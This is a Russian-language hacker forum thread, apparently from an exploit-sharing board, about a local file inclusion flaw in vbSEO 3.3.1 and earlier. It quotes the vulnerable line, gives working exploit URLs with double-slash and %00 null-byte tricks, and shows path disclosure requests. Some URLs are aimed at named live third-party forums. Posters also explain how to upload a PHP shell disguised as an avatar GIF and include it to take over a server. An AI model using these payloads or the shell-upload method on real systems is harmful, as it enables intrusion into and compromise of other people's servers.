![]() |
vbSEO <= 3.3.1 LFI
Продукт: vbSEO <= 3.3.1 (возможно и более позние версии, если таковые имеются)
Офф сайт: vbseo.com Опасность: 9\10 Уязвимый файл: vbseo.php Уязвимый кусок кода: Код:
16: if (isset($_GET['vbseourl'])) $vbseo_url_ = $_GET['vbseourl'];1. Если аватарки заливаются не в БД, то хост уязвим 2. vbseo.php?vbseoembedd=1&vbseourl=images//index.html * юзаем двойные слеши ** из за гребанной функции basename на директорию ниже не спуститься, собственно и RFI обламывается из за этого же ( *** поправочка, конкретно не из за basename, там еще корявенькая фильтрация присутствует Пример дырявого сайта я выкладывал - tgbr.in Дорк оставлю при себе, один хрен на разных сайтах копирайты почему то разные или вообще отсутствуют. |
Само собой инклуд удалённых должен быть включён.
PHP код:
|
Эмм :) Хз куда это написать, напишу сюда - там есть раскрытие путей, мб кому пригодится...
Код:
vbseo.php?vbseourl=cron.html |
Цитата:
как заставить заинклудить ЛЮБУЮ гифку(т.е шелл)? |
Цитата:
|
Цитата:
Код:
http://myp2pforum.eu/vbseo.php?vbseoembedd=1&vbseourl=images/statusicon/post_old.gif |
Цитата:
Хм, а ведь это вариант использования уязвимости без параметра vbseoembedd. В новой версии правда всё равно не работает. А нулл-байт и .php понятно зачем - vbseo.php думает, что это php файл и инклудит его, а там расширение обрезается и инклудится то, что до нулл-байта. Но если аватары в бд, это ничего не даёт. Пример (Isis, превед;): Код:
http://forum.xeka.ru/vbseo.php?vbseourl=.htaccess%00.php |
.Slip, спасибо, но получается, чтобы получить шелл на сервере нужно каким-то другим образом залить в корень фтп гиф картинку или я чего не понимаю?
|
Цитата:
На некоторых булках заливка аватарки идет не в БД, а в диру и в таком случае не что не мешает залить вместо аватарки шелл с расширением картинки и затем проинклудить его. |
| Время: 10:56 |